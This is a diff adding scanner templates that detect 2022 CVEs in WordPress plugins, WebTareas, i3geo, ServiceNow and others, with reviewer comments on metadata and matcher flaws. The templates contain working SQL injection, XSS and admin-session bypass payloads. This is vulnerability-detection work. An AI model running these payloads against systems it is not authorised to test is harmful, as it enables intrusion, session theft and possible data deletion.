cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 50s + GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header, "application/json") + - contains(body, 'Visitor Hit was recorded successfully') + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - '_wpnonce=([0-9a-zA-Z]+)' + internal: true diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml new file mode 100644 index 0000000000..9785f3c096 --- /dev/null +++ b/http/cves/2022/CVE-2022-2535.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2022-2535 + +info: + name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure + author: r3Y3r53 + severity: medium + description: | + The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink + remediation: Fixed in version 1.6.2 + reference: + - https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2535 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-2535 + cwe-id: CWE-639 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/" + tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "searchwp-live-search-result")' + condition: and diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml new file mode 100644 index 0000000000..7c2956dbb1 --- /dev/null +++ b/http/cves/2022/CVE-2022-3142.yaml 
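Review bot: `tags` has `cve2023` for CVE-2022-2535; it should be `cve2022`. The description reads `users making. alive search` — the advisory text is `users making a live search`, so the stray period should go. The matcher `contains(body, "searchwp-live-search-result")` may fire for ordinary published results too, since `swpquery=a` is broad; if the patched plugin still returns public hits for this query, consider a check that distinguishes a draft-only result.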
@@ -0,0 +1,47 @@ +id: CVE-2022-3142 + +info: + name: NEX-Forms Plugin < 7.9.7 - SQL Injection + author: r3Y3r53 + severity: high + description: | + The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings. + remediation: Fixed in version 7.9.7 + reference: + - https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/ + - https://www.exploit-db.com/exploits/51042 + - https://nvd.nist.gov/vuln/detail/CVE-2022-3142 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cwe-id: CWE-89 + cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + publicwww-query: "/wp-content/plugins/nex-forms-express-wp-form-builder/" + max-request: 1 + tags: cve,cve2022,wordpress,sqli,wp-plugin,wp,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + @timeout: 30s + GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)-- HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'status_code_2 == 200' + - 'contains(body_2, "NEX-Forms")' + - 'contains(content_type_2, "text/html")' + condition: and diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml new file mode 100644 index 0000000000..eaa50e0cdb --- /dev/null +++ b/http/cves/2022/CVE-2022-3242.yaml 
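Review bot: `duration>=5` is the only unindexed variable in a matcher that otherwise uses `_2` suffixes (`status_code_2`, `body_2`, `content_type_2`); writing `duration_2>=5` binds the delay to the injected request instead of whichever response the engine defaults to. `classification` lacks `cve-id: CVE-2022-3142`, which every other classified template here carries.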
@@ -0,0 +1,35 @@ +id: CVE-2022-3242 + +info: + name: Microweber <1.3.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2. + reference: + - https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/ + - https://www.tenable.com/cve/CVE-2022-3242 + - https://nvd.nist.gov/vuln/detail/CVE-2022-3242 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + shodan-query: http.favicon.hash:780351152 + tags: xss,cve,cve2023,microweber + +http: + - method: GET + path: + - "{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "") && contains(tolower(body), "microweber")' + condition: and \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34093.yaml b/http/cves/2022/CVE-2022-34093.yaml new file mode 100644 index 0000000000..4cf46fb274 --- /dev/null +++ b/http/cves/2022/CVE-2022-34093.yaml 
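Review bot: `tags` carries `cve2023` for a 2022 CVE and `classification` has no `cve-id`; add `cve-id: CVE-2022-3242` and change the tag to `cve2022`. The description `Code Injection in on search.php?keywords=` has a stray `in on`. The file also ends without a trailing newline (`\ No newline at end of file`), unlike the other templates in this commit; `contains(body, "")` is an empty needle as rendered, so confirm the marker is present in the committed file.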
@@ -0,0 +1,33 @@ +id: CVE-2022-34093 + +info: + name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-34093 + - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-34093 + cwe-id: CWE-79 + cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:* + metadata: + verified: true + tags: cve,cve2022,i3geo,xss + +http: + - method: GET + path: + - "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' + condition: and diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml new file mode 100644 index 0000000000..d0d85e2cbd --- /dev/null +++ b/http/cves/2022/CVE-2022-34094.yaml 
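Review bot: The matcher looks for the percent-encoded string `%3Cscript%3Ealert(document.domain)%3C/script%3E` in the body, i.e. it confirms that the encoded input is echoed, not that it is decoded into markup; a server that reflects the encoded form harmlessly would still match. If the page renders the decoded form, matching on that is the stronger signal — confirm against a live response. `metadata` lacks `max-request: 1`, which the other single-request templates carry.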
@@ -0,0 +1,33 @@ +id: CVE-2022-34094 + +info: + name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php. + reference: + - https://github.com/edmarmoretti/i3geo/issues/5 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34093 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-34094 + cwe-id: CWE-79 + cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:* + metadata: + verified: true + tags: cve,cve2022,i3geo,xss + +http: + - method: GET + path: + - "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' + condition: and diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml new file mode 100644 index 0000000000..3ff9f20a3d --- /dev/null +++ b/http/cves/2022/CVE-2022-39048.yaml 
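Review bot: The NVD reference points to `CVE-2022-34093`, the sibling template's CVE, while this template is CVE-2022-34094; it should be `https://nvd.nist.gov/vuln/detail/CVE-2022-34094`. The percent-encoded matcher has the same caveat as CVE-2022-34093: it proves reflection of the encoded string, not decoding. `metadata` lacks `max-request: 1`.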
@@ -0,0 +1,68 @@ +id: CVE-2022-39048 + +info: + name: ServiceNow - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + A XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems. + reference: + - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1221892 + - https://blog.amanrawat.in/2023/05/05/CVE-2022-39048.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-39048 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-39048 + cwe-id: CWE-79 + metadata: + max-request: 3 + verified: true + shodan-query: http.title:"ServiceNow" + tags: cve,cve2022,xss,servicenow,authenticated + +http: + - raw: + - | + GET /navpage.do HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login.do HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + sysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}¬_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do + + - | + GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - 'unwrapped_url = "javascript:alert(document.domain)//assessment_take2.do"' + - 'assessment_list.do' + condition: and + + - type: word + part: header_3 + words: + - 'text/html' + + - type: status + part: header_3 + status: + - 200 + + extractors: + - 
type: regex + name: csrf + part: body + group: 1 + regex: + - 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"' + internal: true diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml new file mode 100644 index 0000000000..2f056c8411 --- /dev/null +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-40032 + +info: + name: Simple Task Managing System v1.0 - SQL Injection + author: r3Y3r53 + severity: critical + description: | + SQL injection occurs when a web application doesn't properly validate or sanitize user input that is used in SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries. + reference: + - https://www.exploit-db.com/exploits/51273 + - https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-40032 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-40032 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + tags: cve,cve2022,simple-task,stms,sqli + +http: + - raw: + - | + @timeout: 15s + POST /task/loginValidation.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + login=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password= + + matchers: + - type: dsl + dsl: + - 'duration>=7' + - 'status_code == 302' + - "contains(location, 'login.php')" + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml new file mode 100644 index 0000000000..d7c0ddca73 --- /dev/null +++ b/http/cves/2022/CVE-2022-40047.yaml 
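Review bot: In CVE-2022-40032 the injected delay is conditional — `SLEEP(7-(IF(ORD(MID((SELECT ... schema_name ...)))>48,0,1)))` sleeps 7 seconds or 6 depending on a character of the target's first schema name — while the matcher requires `duration>=7`, so a vulnerable host can sleep 6 seconds and be reported clean. A plain unconditional delay with a matching `duration` threshold is deterministic and needs no knowledge of the database. The description is also a generic definition of SQL injection and never names the affected endpoint or parameter (`loginValidation.php`, `login`) the way the other templates do.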
@@ -0,0 +1,54 @@ +id: CVE-2022-40047 + +info: + name: Flatpress < v1.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-40047 + - https://github.com/flatpressblog/flatpress/issues/153 + metadata: + max-request: 2 + verified: true + shodan-query: http.html:"flatpress" + tags: cve,cve2022,flatpress,authenticated,xss + +variables: + randstring: "{{to_lower(rand_base(16))}}" + +http: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}} + + ------WebKitFormBoundary{{randstring}} + Content-Disposition: form-data; name="user" + + {{username}} + ------WebKitFormBoundary{{randstring}} + Content-Disposition: form-data; name="pass" + + {{password}} + ------WebKitFormBoundary{{randstring}} + Content-Disposition: form-data; name="submit" + + Login + ------WebKitFormBoundary{{randstring}}-- + + - | + GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "flatpress")' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "onfocus=\"alert(document.domain)")' + condition: and diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml new file mode 100644 index 0000000000..6cfe0e8983 --- /dev/null +++ b/http/cves/2022/CVE-2022-4049.yaml 
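Review bot: This template has no `classification` block (`cvss-metrics`, `cvss-score`, `cve-id`, `cwe-id`) while every other template in the commit carries one; add it for CVE-2022-40047 with the advisory's values. The `name` says `Flatpress < v1.2.1` but the description says `Flatpress v1.2.1 was discovered to contain` the flaw — one of the two version statements is off, so confirm the affected range against the reference. The multipart boundary uses `{{randstring}}`, which is the pattern CVE-2022-44290 in this commit could share instead of its hard-coded boundary.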
@@ -0,0 +1,60 @@ +id: CVE-2022-4049 + +info: + name: WP User <= 7.0 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. + reference: + - https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be + - https://wordpress.org/plugins/wp-user/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-4049 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-4049 + cwe-id: CWE-89 + metadata: + verified: "true" + publicwww-query: "/wp-content/plugins/wp-user/" + max-request: 2 + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth + +http: + - raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM) + + attack: clusterbomb + payloads: + path: + - "/index.php/user/" + - "/user" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header_2, "text/html") + - contains(body_2, 'Invalid Access') + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - '"wpuser_update_setting":"([0-9a-zA-Z]+)"' + internal: true diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml new file mode 100644 index 0000000000..3411a252ff --- /dev/null +++ b/http/cves/2022/CVE-2022-4059.yaml 
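Review bot: `verified: "true"` is a quoted string here while every other template writes the boolean `verified: true`; use the boolean. `max-request: 2` looks low: two `path` payload values each drive the two-request raw sequence, which would be four requests before `stop-at-first-match` cuts it short — confirm and adjust. `attack: clusterbomb` with a single payload set behaves like the default iteration, so the key is presumably redundant.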
@@ -0,0 +1,42 @@ +id: CVE-2022-4059 + +info: + name: Cryptocurrency Widgets Pack < 2.0 - SQL Injection + author: r3Y3r53 + severity: critical + description: | + The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. + remediation: Fixed in version 2.0 + reference: + - https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d + - https://nvd.nist.gov/vuln/detail/CVE-2022-4059 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-4059 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/cryptocurrency-widgets-pack/" + tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli + +http: + - raw: + - | + @timeout: 20s + GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration_1>=7' + - 'len(body_1) == 0' + - 'status_code_1 == 302' + - 'contains(body_2, "Cryptocurrency Widgets Pack")' + condition: and diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml new file mode 100644 index 0000000000..d2e99cce53 --- /dev/null +++ b/http/cves/2022/CVE-2022-4305.yaml 
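Review bot: `max-request: 1` undercounts a template that sends two raw requests; it should be `max-request: 2`. The second request only proves the plugin is installed (`contains(body_2, "Cryptocurrency Widgets Pack")`), not that it is below 2.0, so a patched site that happens to respond slowly still matches; extracting the `Stable tag` line from `readme.txt` and comparing it would tie the hit to the vulnerable range. Matching a 302 with `len(body_1) == 0` also means the only evidence of injection is the delay itself.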
@@ -0,0 +1,42 @@ +id: CVE-2022-4305 + +info: + name: Login as User or Customer < 3.3 - Privilege Escalation + author: r3Y3r53 + severity: critical + description: | + The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session. + remediation: Fixed in version 3.3 + reference: + - https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd + - https://nvd.nist.gov/vuln/detail/CVE-2022-4305 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-4305 + cwe-id: CWE-269 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/login-as-customer-or-user" + tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass + +http: + - raw: + - | + GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1 + Host: {{Hostname}} + Cookie: loginas_old_user_id=1 + + - | + GET /wp-admin/users.php HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - status_code_2 == 200 + - contains(header_2, "text/html") + - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts') + condition: and diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml new file mode 100644 index 0000000000..a204edf56f --- /dev/null +++ b/http/cves/2022/CVE-2022-44290.yaml 
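Review bot: `max-request: 1` undercounts the two raw requests, and the success condition `contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts')` is satisfied by the admin bar and Posts menu of any logged-in account with edit_posts, not only an administrator. Since request 2 fetches `/wp-admin/users.php`, asserting a string that only renders for an account allowed to manage users would tie the match to the admin session the advisory describes; confirm the exact string on a test instance. A positive hit also means the scanner was actually handed an admin session via `loginas_old_user_id=1`; a comment such as `# a match means the scanner obtained a real admin session on the target` above the first request would make that visible to operators.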
@@ -0,0 +1,61 @@ +id: CVE-2022-44290 + +info: + name: WebTareas 2.4p5 - SQL Injection + author: theamanrawat + severity: critical + description: | + webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php. + reference: + - http://webtareas.com/ + - https://github.com/anhdq201/webtareas/issues/2 + - https://nvd.nist.gov/vuln/detail/CVE-2022-44290 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-44290 + cwe-id: CWE-89 + metadata: + max-request: 2 + verified: true + tags: cve,cve2022,sqli,webtareas,authenticated + +http: + - raw: + - | + POST /general/login.php?session=false HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525 + + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="action" + + login + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="loginForm" + + {{username}} + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="passwordForm" + + {{password}} + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="loginSubmit" + + Log In + -----------------------------3023071625140724693672385525-- + + - | + @timeout: 20s + GET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header, "text/html") + - contains(body, 'Delete the following?') + condition: and diff --git a/http/cves/2022/CVE-2022-44291.yaml b/http/cves/2022/CVE-2022-44291.yaml new file mode 100644 index 0000000000..c3094948e8 --- /dev/null +++ b/http/cves/2022/CVE-2022-44291.yaml 
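Review bot: The blind-SQLi GET to `deleteapprovalstages.php` runs with a valid session, and its outer predicate (`AND (6162=6162`) is true; the matcher expects the confirmation page (`Delete the following?`, 200), which suggests no row is removed, but that should be verified on a test instance because a destructive side effect on approval stage 1 would be unacceptable in a scan template. Once confirmed, record it with `# GET only renders the delete confirmation; the row is not removed` above the second request. The template needs `{{username}}`/`{{password}}`, which the `authenticated` tag implies but the description does not state.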
@@ -0,0 +1,61 @@ +id: CVE-2022-44291 + +info: + name: WebTareas 2.4p5 - SQL Injection + author: theamanrawat + severity: critical + description: | + webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php. + reference: + - http://webtareas.com/ + - https://github.com/anhdq201/webtareas/issues/1 + - https://nvd.nist.gov/vuln/detail/CVE-2022-44291 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-44291 + cwe-id: CWE-89 + metadata: + verified: true + tags: cve,cve2022,sqli,webtareas,authenticated + +http: + - raw: + - | + POST /general/login.php?session=false HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525 + + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="action" + + login + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="loginForm" + + {{username}} + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="passwordForm" + + {{password}} + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="loginSubmit" + + Log In + -----------------------------3023071625140724693672385525-- + + - | + @timeout: 20s + GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration_2>=6' + - 'len(body_2) == 0' + - 'status_code_2 == 302' + - 'contains(header_2, "text/html")' + - 'contains(body_1, "webTareasSID")' + condition: and diff --git a/http/cves/2022/CVE-2022-44957.yaml b/http/cves/2022/CVE-2022-44957.yaml new file mode 100644 index 0000000000..859b3bcbd4 --- /dev/null +++ b/http/cves/2022/CVE-2022-44957.yaml 
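Review bot: Request 2 sends `mode=delete&id=1) AND ... AND (6162=6162` with a true outer predicate, and the matcher requires a 302 with an empty body, which is consistent with a post-action redirect; if `phasesets.php` deletes on GET, a successful probe removes phase set 1 on the target. Confirm on a test instance, and if the row is removed either use a read-only mode or make the outer predicate false (`AND (6162=6163`) so the delete matches nothing, checking that the SLEEP in the derived table still produces the delay. `max-request: 2` is missing from `metadata` unlike the sibling CVE-2022-44290 template, and `contains(body_1, "webTareasSID")` depends on the login response echoing the session cookie name in its body, which deserves a comment.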
@@ -0,0 +1,166 @@ +id: CVE-2022-44957 + +info: + name: WebTareas 2.4p5 - Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + reference: + - http://webtareas.com/ + - https://github.com/anhdq201/webtareas/issues/11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-44957 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44957 + cwe-id: CWE-79 + metadata: + max-request: 3 + verified: true + tags: cve,cve2022,xss,webtareas,authenticated + +http: + - raw: + - | + POST /general/login.php?session=false HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525 + + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="action" + + login + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="loginForm" + + {{username}} + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="passwordForm" + + {{password}} + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="loginSubmit" + + Log In + -----------------------------3023071625140724693672385525-- + + - | + GET /clients/editclient.php? 
HTTP/1.1 + Host: {{Hostname}} + + - | + POST /clients/editclient.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061 + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="csrfToken" + + {{csrf}} + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="action" + + add + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="cown" + + 1 + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="cn" + + {{randstr}}
+ -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="add" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="zip" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="ct" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="cou" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="wp" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="fa" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="url" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="email" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="curr" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="wc" + + 1 + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="pym" + + 1 + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="pyt" + + 7 + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="c" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="ssc" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="file1"; filename="" + Content-Type: 